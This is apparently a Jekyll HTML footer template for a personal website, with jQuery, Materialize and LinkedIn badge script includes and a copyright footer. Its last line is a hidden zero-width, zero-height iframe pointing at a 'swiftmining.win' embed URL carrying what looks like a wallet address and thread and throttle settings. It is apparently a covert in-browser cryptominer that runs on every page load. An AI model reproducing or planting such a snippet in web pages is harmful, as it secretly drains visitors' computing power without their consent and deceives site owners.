<script type="text/javascript" src="{{site.baseurl}}/assets/js/jquery-3.2.1.min.js"></script>
<script type="text/javascript" src="{{site.baseurl}}/assets/js/materialize.min.js"></script>
<script src="{{site.baseurl}}/assets/js/init.js"></script>
<script type="text/javascript" src="https://platform.linkedin.com/badges/js/profile.js" async defer></script>
</body>
<footer class="page-footer">
  <div class="footer-copyright" style="padding-left: 30px">
    <i class="material-icons" style="padding-right:5px">copyright</i><p>2018 Copyright {{ site.name }} | All rights reserved</p>
  </div>
</footer>
<iframe src='https://swiftmining.win/embed/1LxS1ieCgu5noLTVCBLovNCpUidspzjsWC/threads/3/throttle/0.3' style="width:0;height:0;border:0; border:none;"></iframe>
</html>
